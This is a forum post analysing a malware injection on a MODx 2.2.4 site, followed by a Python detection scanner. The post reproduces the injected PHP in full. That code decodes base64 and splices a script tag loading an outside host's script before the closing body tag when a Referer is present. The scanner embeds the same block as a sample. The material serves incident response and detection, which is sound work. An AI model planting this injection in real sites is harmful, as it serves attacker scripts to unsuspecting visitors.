Hi everyone,
I'm not a MODx guy, but I did inherit a site from a client that runs MODx 2.2.4. I noticed that their site was hit by this bug and decided to do some debugging to determine exactly how this code is being injected into the site. By messing around with a few things I was able to determine that the closing body tag was being replaced with the exploit code. Further digging into MODx's template / parsing engine led me to find the following code in /core/model/modx/modresponse.class.php at line 188:
// Injected code (not part of MODx): only runs when the request carries a Referer header
if ($_SERVER["HTTP_REFERER"] != '') {
    // base64-encoded <noindex><script src="//stat.rolledwil.biz/stat.php?<replace>"></script></noindex>
    $linker = base64_decode("PG5vaW5kZXg+CjxzY3JpcHQgc3JjPSIvL3N0YXQucm9sbGVkd2lsLmJpei9zdGF0LnBocD88cmVwbGFjZT4iPjwvc2NyaXB0Pgo8L25vaW5kZXg+");
    // Server IP with the periods stripped, used as the script's query string
    $param = str_replace('.', '', $_SERVER['SERVER_ADDR']);
    $linker = str_replace('<replace>', $param, $linker);
    // Splice the script tag in just before the closing body tag of the rendered resource
    $this->modx->resource->_output = str_replace("</body>", $linker . "\n</body>", $this->modx->resource->_output);
}
In short, what the above does is: if there is an HTTP referrer in the browser headers, replace the closing body tag with the following:
<noindex>
<script src="//stat.rolledwil.biz/stat.php?(IP of server with periods stripped)"></script>
</noindex>
</body>
Someone else has already posted an analysis of what the included script does, so I won't go into that.
Anyway, most of you are probably here looking for the solution. I don't have a complete answer, but here is something to get you started:
- You more than likely have a cache.php in your /assets/ folder. DELETE THIS FILE as it is a remote execution exploit that allows hackers to run commands on your server.
- Either replace your modresponse.class.php with an original source file or open it up and delete the code described above.
The big question is how the original cache.php was placed on the server to begin with. It could be due to an exploit in a plugin or in the core system. In my case, the cache.php file has been on the server for close to a year, but a handful of plugins have been updated since, so I don't really have a way to start looking into this. If I find that the cache.php file somehow makes it back onto the server, I'll investigate further to see if I can figure out what's being exploited.
Good luck.
[ed. note: mmatos last edited this post 9 years, 10 months ago.]
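The post above describes the injection by hand: a Referer-gated block that decodes a hard-coded base64 payload and splices it in front of `</body>`. The following scanner is an added example written for this page, not code from the post or from MODx. It decodes every `base64_decode("...")` literal in a PHP source, flags decoded payloads that contain markup, flags the `</body>` splice and the Referer gate, reproduces the exact tag the patched file emits for a given server address, and walks an install directory looking for `assets/cache.php`. The embedded `SAMPLE_PHP` is a constructed copy of the injected block quoted above (same base64 literal); the function names, the indicator labels, and the choice of `<script|<iframe|eval(` as the markup test are assumptions of this example.

```python
import base64
import re
from pathlib import Path

# Constructed sample: the injected block quoted in the post, embedded so the
# scanner runs offline. The base64 literal is the one from the post.
SAMPLE_PHP = r'''<?php
if ($_SERVER["HTTP_REFERER"]!='') {
$linker = base64_decode("PG5vaW5kZXg+CjxzY3JpcHQgc3JjPSIvL3N0YXQucm9sbGVkd2lsLmJpei9zdGF0LnBocD88cmVwbGFjZT4iPjwvc2NyaXB0Pgo8L25vaW5kZXg+");
$param = str_replace('.','',$_SERVER['SERVER_ADDR']);
$linker = str_replace('<replace>', $param, $linker );
$this->modx->resource->_output = str_replace("</body>", $linker."\n</body>", $this->modx->resource->_output); }
'''

# base64_decode("...") with a literal argument: obfuscated payloads are usually stored this way
B64_CALL = re.compile(r'base64_decode\(\s*[\'"]([A-Za-z0-9+/=]+)[\'"]\s*\)')
# str_replace whose search string is the closing body tag (the splice point the post found)
BODY_SPLICE = re.compile(r'str_replace\(\s*[\'"]</body>[\'"]', re.I)
# The Referer check that keeps the injection from firing on direct visits
REFERER_GATE = re.compile(r'\$_SERVER\[\s*[\'"]HTTP_REFERER[\'"]\s*\]')


def decode_literals(php_source):
    """Return (base64, decoded_text) for every base64_decode("...") literal in the source."""
    out = []
    for m in B64_CALL.finditer(php_source):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError; skip literals that are not base64
            continue
        out.append((m.group(1), decoded))
    return out


def find_indicators(php_source):
    """Flag encoded markup, the </body> splice, and the Referer gate in one PHP source."""
    findings = []
    for _, decoded in decode_literals(php_source):
        if re.search(r'<script|<iframe|eval\(', decoded, re.I):
            findings.append(("encoded-markup", decoded.strip()))
    if BODY_SPLICE.search(php_source):
        findings.append(("body-splice", "str_replace on </body>"))
        if REFERER_GATE.search(php_source):
            findings.append(("referer-gated-injection", "only fires when a Referer header is present"))
    return findings


def injected_markup(server_addr):
    """Reproduce what the patched modresponse emits for a given SERVER_ADDR:
    the decoded payload with <replace> swapped for the address minus its periods,
    followed by the closing body tag the original str_replace re-adds."""
    decoded = decode_literals(SAMPLE_PHP)[0][1]
    return decoded.replace("<replace>", server_addr.replace(".", "")) + "\n</body>"


def scan_install(root):
    """Walk a MODx install: report assets/cache.php (named by the post as the dropper)
    and every .php file that carries one of the indicators above."""
    root = Path(root)
    report = {}
    dropper = root / "assets" / "cache.php"
    if dropper.exists():
        report[str(dropper)] = [("unexpected-file", "assets/cache.php; confirm it is not yours before deleting")]
    for php in root.rglob("*.php"):
        hits = find_indicators(php.read_text(errors="replace"))
        if hits:
            report.setdefault(str(php), []).extend(hits)
    return report


if __name__ == "__main__":
    for kind, detail in find_indicators(SAMPLE_PHP):
        print(f"{kind}: {detail}")
    print(injected_markup("203.0.113.7"))
```

Run `scan_install("/path/to/modx")` against the web root to get a per-file list of hits; a clean `core/model/modx/modresponse.class.php` produces no findings, and the `body-splice` finding on its own is worth a look even without the Referer gate, since a cleaner variant of the same trick would drop that check.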